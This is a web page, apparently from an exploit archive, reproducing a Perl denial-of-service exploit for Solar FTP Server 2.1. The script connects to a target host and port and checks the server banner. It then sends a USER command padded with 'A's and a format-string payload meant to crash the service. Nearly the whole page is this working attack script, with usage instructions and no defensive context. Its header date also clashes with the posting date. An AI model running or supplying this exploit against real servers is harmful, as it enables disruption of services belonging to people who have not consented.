Home / os / win7

Solar FTP 2.1 Denial Of Service

Posted on 22 February 2011

#!/usr/bin/perl # #[+]Exploit Titulo: Exploit Denial of Service Solar FTP 2.1 #[+]Date: 21/10/2011 #[+]Author: x000 #[+]Version: 2.1 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxxxx xxx xxx xxx xxx xxx xxx xxxxxx # xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx # xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx # xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx # # # # Link de Download: http://solarftp.com/files/solarftps-setup.exe # # .: Criador by: x000 :. # 3d3n@hotmail.com.br # www.x000.org # Obrigado C4SS!0 G0M3S Friends Forever # use Socket; use IO::Socket; use strict; use warnings; my $sys = `ver`; if($sys=~/Windows/){ system("cls"); system("color 4f"); } else{ system("clear"); } sub usage{ print q { 00 00 000000 000000 000000 00 00 00000000 00000000 00000000 0000 0 0 0 0 0 0 0000 0 0 0 0 0 0 00 00 00000000 00000000 00000000 00 00 000000 000000 000000 | Criador x000 | | Contato: 3d3n@hotmail.com.br | | From Brazil | | Site www.x000.org | }; } if($#ARGV!=1){ usage; print " [-]Modo de Uso: perl $0 <Host> <Porta> "; print " [-]Exemplo:perl $0 192.168.1.12 21 "; exit; } usage; print " [+]Conectando ao Servidor $ARGV[0]... "; sleep(1); my $exploit = "A" x 50; $exploit = $exploit."%x%lf%f%d%c%s%c%u%n%s%c%lf%tt%d%c"; my $sock = IO::Socket::INET->new( PeerAddr=>$ARGV[0], PeerPort=>int($ARGV[1]), Timeout=>1, Proto=>"tcp", )or die("ERRO: $! "); print " [+]Checando se o Servidor e Vulneravel "; sleep(1); $sock->recv(my $data,2000); unless($data=~/Solar FTP Server/){ print " [+]Servidor Nao e Vulneravel:( "; sleep(1); exit; } print " [+]Servidor Vulneravel:) "; sleep(1); print " [+]Enviando Exploit Denial of Service "; sleep(1); $sock->send("USER $exploit "); close($sock); print " [+]Exploit Denial Of Service Enviado:) "; # x000.org

 

TOP